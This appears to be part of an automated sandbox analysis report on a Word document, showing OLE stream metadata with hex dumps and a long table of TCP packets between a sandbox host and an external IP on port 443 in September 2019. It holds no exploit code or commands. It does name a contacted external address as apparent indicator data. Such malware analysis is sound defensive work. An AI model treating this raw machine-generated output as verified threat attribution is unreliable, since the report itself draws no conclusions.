                General
                Stream Path:ObjectPool/_1630480620/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . B f C z m t b M . . . . 5 . . . . . . . . . . . . . . . C a l i b r i M
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 42 66 43 7a 6d 74 62 4d 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 4d
                Stream Path: WordDocument, File Type: data, Stream Size: 5678
                General
                Stream Path:WordDocument
                File Type:data
                Stream Size:5678
                Entropy:3.54565498894
                Base64 Encoded:False
                Data ASCII:. . . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . [ f f . [ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ .
                Data Raw:ec a5 c1 00 6b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 82 0a 00 00 0e 00 62 6a 62 6a 04 ae 04 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 16 00 00 66 c4 5b 66 66 c4 5b 66 82 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 20, 2019 13:30:07.560237885 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.685724974 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.685929060 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.701771021 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.827321053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.830837011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.830905914 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.831003904 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.831084967 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.831115007 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.831135988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:07.831199884 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.851461887 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:07.977262020 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.238907099 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.436014891 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.567738056 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.567780018 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.567877054 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.567910910 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.568070889 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568116903 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568219900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568231106 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.568288088 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568351984 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.568412066 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568515062 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568603039 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.568650961 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.693723917 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.693768978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.693805933 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.693912029 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694026947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694078922 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694133043 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694216013 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694328070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694391012 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694433928 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694539070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694632053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694634914 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.694798946 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694840908 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694953918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.694992065 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695050001 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695154905 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695200920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695245981 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695348978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695395947 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.695472956 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695568085 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.695621014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.698884964 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.819525003 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819581985 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819667101 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819740057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819850922 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.819859028 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820059061 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820101976 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820159912 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820250988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820353985 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820359945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820462942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820560932 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820611954 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820693970 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820811033 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.820816994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820911884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.820962906 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821022987 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821094036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821182966 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821274996 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821281910 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821387053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821469069 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821537018 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821625948 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821717978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821799040 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.821818113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821913958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.821976900 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822004080 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822113991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822201014 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822297096 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822299004 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822439909 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822510958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822602034 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822619915 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822711945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822771072 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.822876930 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.822952032 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823030949 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823131084 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.823132992 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.824213982 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.824306011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.824383974 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.826369047 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.945377111 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945451021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945477009 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945574045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945748091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945817947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945847034 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.945908070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.945982933 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946075916 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946114063 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946260929 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946310997 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946384907 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946496964 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946527958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946590900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946679115 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.946690083 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946815014 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.946897030 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947016001 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947047949 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947160006 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947202921 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947285891 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947335958 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947396994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947489977 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947514057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947664022 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947705984 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947802067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.947813988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.947922945 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948246002 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.948723078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948782921 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.948903084 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.949142933 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.951946020 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.951987028 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952092886 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952177048 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952256918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952312946 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952347994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952460051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952492952 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952537060 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952570915 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952677011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952735901 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.952791929 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952908993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.952913046 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953056097 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953138113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953205109 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953243017 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953361988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953453064 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953561068 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953572035 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953665972 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953756094 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953811884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.953845978 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.953959942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954004049 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954112053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954145908 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.954222918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954308033 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:08.954332113 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:08.960114956 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071343899 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071379900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071408987 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071523905 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071603060 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071615934 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071739912 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071780920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.071871042 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.071960926 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.072030067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074462891 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074592113 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074664116 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074763060 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074798107 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074887991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.074996948 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.074997902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075078011 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075175047 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075190067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075290918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075449944 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075488091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075503111 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075607061 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075644016 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075699091 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075781107 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.075798988 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075900078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.075994968 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076026917 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.076138973 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076239109 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076297998 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.076329947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076423883 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076513052 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.076538086 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.077749014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.085689068 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.085767031 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.085860014 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.085870028 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.085988045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086082935 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086098909 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086194992 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086280107 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086364031 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086369991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086468935 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086540937 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086610079 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086688995 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086785078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086833954 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086898088 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086987019 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086990118 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087121010 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087212086 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087266922 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087297916 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087408066 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087415934 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087498903 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087569952 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087601900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087702036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087807894 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087831974 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087915897 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088018894 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088076115 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.088110924 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088682890 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197242022 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197278023 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197352886 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197417021 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197449923 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197552919 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197628021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197633028 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197762012 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197777033 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197829962 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197931051 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200251102 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200329065 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200407982 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200469017 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200541019 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200608969 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200644016 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200719118 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200850010 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200963020 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203258038 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203371048 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203402042 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203505993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203572035 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203603983 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203716040 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203819036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203860998 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203903913 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204010010 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204011917 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204117060 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204222918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204241037 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204324961 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204379082 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204425097 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204525948 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204684973 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.205642939 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.211277962 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211344957 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211513996 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211594105 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.211600065 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216373920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.216432095 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216460943 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216480970 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216499090 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216516972 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216536045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216553926 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216572046 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216589928 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216612101 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216624975 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216644049 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216662884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216680050 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216698885 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216716051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216733932 CEST44349163198.49.65.242192.168.1.16
